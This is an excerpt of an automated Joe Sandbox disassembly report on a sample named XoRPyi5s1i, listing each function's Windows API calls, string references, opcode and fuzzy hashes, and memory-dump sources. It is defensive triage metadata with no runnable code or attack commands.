                                    • Opcode ID: 5ebe434df4ddc327b31d947f47c31bb4d827a5eb533d86813aab56459f55bd8b
                                    • Instruction ID: 6d2a3b31ac747a602bd94127be1d724877599ba79158b6d8a83eeefd89f53e16
                                    • Opcode Fuzzy Hash: 5ebe434df4ddc327b31d947f47c31bb4d827a5eb533d86813aab56459f55bd8b
                                    • Instruction Fuzzy Hash: 214109B4604680EAD73D4B289D8DB7A7ED6FB56324F6A480DE08783D71DB70B880D711
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0016AEF1,00000B00,?,?), ref: 0016B26C
                                    • RtlAllocateHeap.NTDLL(00000000,?,0016AEF1), ref: 0016B273
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0016AEF1,00000B00,?,?), ref: 0016B288
                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0016AEF1,00000B00,?,?), ref: 0016B290
                                    • DuplicateHandle.KERNEL32(00000000,?,0016AEF1,00000B00,?,?), ref: 0016B293
                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0016AEF1,00000B00,?,?), ref: 0016B2A3
                                    • GetCurrentProcess.KERNEL32(0016AEF1,00000000,?,0016AEF1,00000B00,?,?), ref: 0016B2AB
                                    • DuplicateHandle.KERNEL32(00000000,?,0016AEF1,00000B00,?,?), ref: 0016B2AE
                                    • CreateThread.KERNEL32(00000000,00000000,0016B2D4,00000000,00000000,00000000), ref: 0016B2C8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                    • String ID:
                                    • API String ID: 1422014791-0
                                    • Opcode ID: e740b360e5a738564abd11b627b5755b8753fa02dcfac3c1486f3aa26adf9eb9
                                    • Instruction ID: 58d2ad164f4f6f61f31f649bae028a5ab28d640b4ccb75831df77a7d89b85d16
                                    • Opcode Fuzzy Hash: e740b360e5a738564abd11b627b5755b8753fa02dcfac3c1486f3aa26adf9eb9
                                    • Instruction Fuzzy Hash: 3701CDB5240304BFE714AFA5EC8DF6B7BACEB88711F018511FA05DB6A1DB749840CB61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: NULL Pointer assignment$Not an Object type
                                    • API String ID: 0-572801152
                                    • Opcode ID: 5e0b78b6205dd0618b0bda836e540f7026c11e4dfb46f8cd489efb1270d67de5
                                    • Instruction ID: 560eb9394ba306d604910ee63d63d46a4562cf353dfa14ed3c6eaa874e8bcc45
                                    • Opcode Fuzzy Hash: 5e0b78b6205dd0618b0bda836e540f7026c11e4dfb46f8cd489efb1270d67de5
                                    • Instruction Fuzzy Hash: C1E1A571A00219AFDF14EFA8D885AEE77B5EF58354F148029F905A7281E770AE45CFE0
                                    APIs
                                      • Part of subcall function 00176532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00176554
                                      • Part of subcall function 00176532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00176564
                                      • Part of subcall function 00176532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 001765F9
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0019179A
                                    • GetLastError.KERNEL32 ref: 001917AD
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001917D9
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00191855
                                    • GetLastError.KERNEL32(00000000), ref: 00191860
                                    • CloseHandle.KERNEL32(00000000), ref: 00191895
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 2533919879-2896544425
                                    • Opcode ID: 04b4255c077a8b5218aa482bf1b712fb5e4f4bbf3472635cb5e4e167655f511d
                                    • Instruction ID: 76d8424ab40926df851939ee37d8224db2da73a10b1f4086a4b09c970f804c71
                                    • Opcode Fuzzy Hash: 04b4255c077a8b5218aa482bf1b712fb5e4f4bbf3472635cb5e4e167655f511d
                                    • Instruction Fuzzy Hash: 0641AE71600202AFDB09EF54C8D5F6DB7B5BF64310F058058F90A9F2D2DB74A980CB91
                                    APIs
                                    • LoadIconW.USER32(00000000,00007F03), ref: 001758B8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: IconLoad
                                    • String ID: blank$info$question$stop$warning
                                    • API String ID: 2457776203-404129466
                                    • Opcode ID: 132dff19d1e8b1e37a831cd3439e3fb910be39b062c8ba79d37228d7871043d4
                                    • Instruction ID: a5dd489ccb97324a491238dbad4c0ffc2a32c92bf60f95fe32414a6001655d16
                                    • Opcode Fuzzy Hash: 132dff19d1e8b1e37a831cd3439e3fb910be39b062c8ba79d37228d7871043d4
                                    • Instruction Fuzzy Hash: 44110031209B42FBE7055B669C42D6E33BE9F2D314B20403BF514E61C1E7F0AA404266
                                    APIs
                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0017A806
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ArraySafeVartype
                                    • String ID:
                                    • API String ID: 1725837607-0
                                    • Opcode ID: 952196af1d0e10b4468c2fc7f327e8a31590b74f839f3ca486b7f957a677b4c7
                                    • Instruction ID: dd4ee2813025614b1f4fee992bdb2e5b66b12a901781355c84f1d36e867897b0
                                    • Opcode Fuzzy Hash: 952196af1d0e10b4468c2fc7f327e8a31590b74f839f3ca486b7f957a677b4c7
                                    • Instruction Fuzzy Hash: 44C1AF75A0420ADFDB04CF98D481BAEBBF4FF49315F248469E609E7251D734A981CB92
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00176B63
                                    • LoadStringW.USER32(00000000), ref: 00176B6A
                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00176B80
                                    • LoadStringW.USER32(00000000), ref: 00176B87
                                    • _wprintf.LIBCMT ref: 00176BAD
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00176BCB
                                    Strings
                                    • %s (%d) : ==> %s: %s %s, xrefs: 00176BA8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message_wprintf
                                    • String ID: %s (%d) : ==> %s: %s %s
                                    • API String ID: 3648134473-3128320259
                                    • Opcode ID: 334336ec54bb494b5ec426f6e08d5065ac15e27b998d0ee101c5f7810cc3b67e
                                    • Instruction ID: fa0b3d7eeed6572e41b57c097b7ba82c0af8889d9d5e68757f89f72809e16b1a
                                    • Opcode Fuzzy Hash: 334336ec54bb494b5ec426f6e08d5065ac15e27b998d0ee101c5f7810cc3b67e
                                    • Instruction Fuzzy Hash: F60162F6900208BFE715A7A4AD89EF6337CD704304F0045A5B755E2041EB749EC48B71
                                    APIs
                                      • Part of subcall function 00193C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00192BB5,?,?), ref: 00193C1D
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00192BF6
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BuffCharConnectRegistryUpper
                                    • String ID:
                                    • API String ID: 2595220575-0
                                    • Opcode ID: ef1204dc013b89ec7235fcc2e290c6ba2223c87c3dd64d5ef785485cf3840a84
                                    • Instruction ID: a176fcd9192046c970cd2c5c75735a63344b69950bfd6de3885c9de06bca0a57
                                    • Opcode Fuzzy Hash: ef1204dc013b89ec7235fcc2e290c6ba2223c87c3dd64d5ef785485cf3840a84
                                    • Instruction Fuzzy Hash: AD916871604201AFCB04EF54C891B6EB7E5FFA8310F14885DF99A972A2DB34E945CF82
                                    APIs
                                    • __mtinitlocknum.LIBCMT ref: 0015A991
                                      • Part of subcall function 00157D7C: __FF_MSGBANNER.LIBCMT ref: 00157D91
                                      • Part of subcall function 00157D7C: __NMSG_WRITE.LIBCMT ref: 00157D98
                                      • Part of subcall function 00157D7C: __malloc_crt.LIBCMT ref: 00157DB8
                                    • __lock.LIBCMT ref: 0015A9A4
                                    • __lock.LIBCMT ref: 0015A9F0
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,001E6DE0,00000018,00165E7B,?,00000000,00000109), ref: 0015AA0C
                                    • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0015AA29
                                    • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0015AA39
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                    • String ID:
                                    • API String ID: 1422805418-0
                                    • Opcode ID: 4bac23f9a0968694c2bb1b5e3b2a6e42e50b9587834f1cbd0d1ec8db1659e069
                                    • Instruction ID: 80aad46be103e582b788da1ce5f79635736762a19cc7cd2b4cd1807e58a0f78b
                                    • Opcode Fuzzy Hash: 4bac23f9a0968694c2bb1b5e3b2a6e42e50b9587834f1cbd0d1ec8db1659e069
                                    • Instruction Fuzzy Hash: B0413771940205DBEB148F68D94176CB7A0BF14326F918319EC39AF2D2E7B49948CB91
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 00198EE4
                                    • GetDC.USER32(00000000), ref: 00198EEC
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00198EF7
                                    • ReleaseDC.USER32(00000000,00000000), ref: 00198F03
                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00198F3F
                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00198F50
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0019BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00198F8A
                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00198FAA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                    • String ID:
                                    • API String ID: 3864802216-0
                                    • Opcode ID: 14f15ac93d005be54447937b88cc22b1dccdcf54cddff7b30afe8fff1a4ecf29
                                    • Instruction ID: 31a59882cdf80e89f4831fa356bfcb1c808f9f419f29c5ef2d97776d80037d03
                                    • Opcode Fuzzy Hash: 14f15ac93d005be54447937b88cc22b1dccdcf54cddff7b30afe8fff1a4ecf29
                                    • Instruction Fuzzy Hash: 07316B72200214BFEF148F50DC8AFEA3BA9EF4A715F044165FE09DA191EBB59881CB70
                                    APIs
                                    • select.WS2_32 ref: 00189691
                                    • WSAGetLastError.WS2_32(00000000), ref: 0018969E
                                    • __WSAFDIsSet.WS2_32(00000000,?), ref: 001896C8
                                    • WSAGetLastError.WS2_32(00000000), ref: 001896F8
                                    • htons.WS2_32(?), ref: 001897AA
                                    • inet_ntoa.WS2_32(?), ref: 00189765
                                      • Part of subcall function 0016D2FF: _strlen.LIBCMT ref: 0016D309
                                    • _strlen.LIBCMT ref: 00189800
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                    • String ID:
                                    • API String ID: 3480843537-0
                                    • Opcode ID: 412a0a1b37e8cc37814be0481352b6d8b4c4cac477466732b62ba28b3dbb5060
                                    • Instruction ID: 2b7b13d92fb2fc921611c5a919728c0d3fd6277a7dd029794414ee890d681aa4
                                    • Opcode Fuzzy Hash: 412a0a1b37e8cc37814be0481352b6d8b4c4cac477466732b62ba28b3dbb5060
                                    • Instruction Fuzzy Hash: AC81CD31504200AFC714EF64DC86E6BBBF9EFA9714F144A2DF5559B2A1EB30DA04CB92
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9ba7d2ce8652f5cdff1a738e89f48039b9f2bc06288f0b5e2d0cba79072904de
                                    • Instruction ID: b0619921f4aa28038c766ab7f272f1cbcfa1557c60509ab5b5dc9c0c3c9a8d10
                                    • Opcode Fuzzy Hash: 9ba7d2ce8652f5cdff1a738e89f48039b9f2bc06288f0b5e2d0cba79072904de
                                    • Instruction Fuzzy Hash: E7717DB1944109EFDB08CF98CC88AAEBB74FF85314F158159F915AB261D730AA45CF61
                                    APIs
                                    • _memset.LIBCMT ref: 0019225A
                                    • _memset.LIBCMT ref: 00192323
                                    • ShellExecuteExW.SHELL32(?), ref: 00192368
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                      • Part of subcall function 0014C6F4: _wcscpy.LIBCMT ref: 0014C717
                                    • CloseHandle.KERNEL32(00000000), ref: 0019242F
                                    • FreeLibrary.KERNEL32(00000000), ref: 0019243E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                    • String ID: @
                                    • API String ID: 4082843840-2766056989
                                    • Opcode ID: 2cd710c370920c40e58250dce6ab7b4fd1444f6b1a26f4125c09815c1e124997
                                    • Instruction ID: 307352cf81eadfd7fd6debc0eb736d89dfa637010667cc979c1143b88f18e441
                                    • Opcode Fuzzy Hash: 2cd710c370920c40e58250dce6ab7b4fd1444f6b1a26f4125c09815c1e124997
                                    • Instruction Fuzzy Hash: 9C7170B4A00619EFCF05EFA4D8959AEB7F5FF58310F108459E859AB361DB34AE40CB90
                                    APIs
                                    • GetParent.USER32(00000000), ref: 00173C02
                                    • GetKeyboardState.USER32(?), ref: 00173C17
                                    • SetKeyboardState.USER32(?), ref: 00173C78
                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00173CA4
                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00173CC1
                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00173D05
                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00173D26
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: 09afa4c893aaa532844096ea060e55a023d5588c2535160c1e52fb67ff5edba3
                                    • Instruction ID: 24a8b11d386d4897788f109bf1ded7d70b6db8e38fc904942fc74d703accd2d1
                                    • Opcode Fuzzy Hash: 09afa4c893aaa532844096ea060e55a023d5588c2535160c1e52fb67ff5edba3
                                    • Instruction Fuzzy Hash: 7051B1A05486D539FB378364CC45BB6BEB9AB06300F08C589E1ED5A8C2D795EE84F760
                                    APIs
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00198FE7
                                    • GetWindowLongW.USER32(017495B0,000000F0), ref: 0019901A
                                    • GetWindowLongW.USER32(017495B0,000000F0), ref: 0019904F
                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00199081
                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001990AB
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 001990BC
                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001990D6
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LongWindow$MessageSend
                                    • String ID:
                                    • API String ID: 2178440468-0
                                    • Opcode ID: 7b771961327045db9726d533f5657e1a766a5bbd6445f18ec424ec678a523518
                                    • Instruction ID: 7cf303a760976aface8ccfdb4a053c3f1b6891cbb3fc25dfe4a7a415ae1964ac
                                    • Opcode Fuzzy Hash: 7b771961327045db9726d533f5657e1a766a5bbd6445f18ec424ec678a523518
                                    • Instruction Fuzzy Hash: 69312A35600215EFDF208F58DC85F6537B9FB4A724F1902A8F529CB6B1CBB2A880DB41
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001708F2
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00170918
                                    • SysAllocString.OLEAUT32(00000000), ref: 0017091B
                                    • SysAllocString.OLEAUT32(?), ref: 00170939
                                    • SysFreeString.OLEAUT32(?), ref: 00170942
                                    • StringFromGUID2.COMBASE(?,?,00000028), ref: 00170967
                                    • SysAllocString.OLEAUT32(?), ref: 00170975
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
